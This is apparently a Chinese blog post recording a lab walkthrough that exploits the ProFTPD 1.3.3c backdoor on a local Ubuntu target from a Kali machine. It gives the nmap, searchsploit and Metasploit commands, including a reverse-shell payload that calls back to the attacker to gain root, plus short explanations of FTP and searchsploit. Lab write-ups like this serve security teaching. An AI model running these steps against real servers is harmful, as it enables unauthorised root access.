FTP服务后门利用
靶場: ubuntu 192.168.142.128
攻擊機: kali? 192.168.11.165
信息收集:
探測服務信息:
nmap -sV 192.168.142.128可以看到靶機開啟了 21 ftp服務,版本號為?ProFTPD 1.3.3c
使用 searchsploit 查看漏洞信息,找到可以利用的溢出代碼
可以看到有兩個可以用的漏洞,
第一個是 遠程后門 ,后面有漏洞利用的代碼,
第二個漏洞利用 集成到了 metasploit 中 ,可以利用 metasploit進行更簡單的操作
打開 metasploit framwork: msfconsole
搜索可以使用的模塊:
我們選用 第4 個模塊
use exploit/unix/ftp/proftpd_133c_backdoor接著設置payload,
先看看有哪些可以使用的payload:
show payloads這里使用 第 3 個
set payload cmd/unix/reverse然后查看還需要哪些設置:
show options還需要設置 rhost 目標ip? 和 lhost 監聽ip
set rhost 192.168.142.128set lhost 192.168.11.165設置好了 ,啟動
exploit可以看到 已經成功 侵入,并且權限是 root
優化一下 命令行:
python -c "import pty; pty.spawn('/bin/bash')"切換到 /root 目錄下獲取fllag
?
充電站:
1,什么是 FTP?
是文件傳輸協議的簡稱。用于Internet上的控制文件的雙向傳輸。同時,它也是一個應用程序(Application)。用戶可以通過它把自己的PC機與世界各地所有運行FTP協議的服務器相連,訪問服務器上的大量程序和信息。
FTP 是因特網網絡上歷史最悠久的網絡工具,從 1971 年由 A KBHUSHAN 提出第一個 FTP 的RFC(RFC114)?[2]??至今近半個世紀來,FTP 憑借其獨特的優勢一直都是因特網中最重要、最廣泛的服務之一。?[3]?
FTP 的目標是提高文件的共享性,提供非直接使用遠程計算機,使存儲介質對用戶透明和可靠高效地傳送數據。它能操作任何類型的文件而不需要進一步處理,就像MIME或Unicode一樣。但是,FTP有著極高的延時,這意味著,從開始請求到第一次接收需求數據之間的時間,會非常長;并且不時的必須執行一些冗長的登錄進程
2, searchsploit 是什么?
顧名思義,它將搜索所有的漏洞和shellcode。它不會包含任何文件和谷歌黑客數據庫的結果
earchSploit為您提供了在本地保存的存儲庫中執行詳細的離線搜索的能力。這種能力特別適用于在沒有互聯網接入的情況下對網絡進行安全評估。許多漏洞都包含了二進制文件的鏈接,這些文件不包含在標準存儲庫中,但可以在我們的Exploit-DB二進制文件中找到。
如果您預計您將在一個沒有Internet的網絡環境進行滲透測試,請確保您檢查了兩個存儲庫,以獲得最完整的數據集
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
總結
- 上一篇: metasploit framework
- 下一篇: upload总结及一般处理思路步骤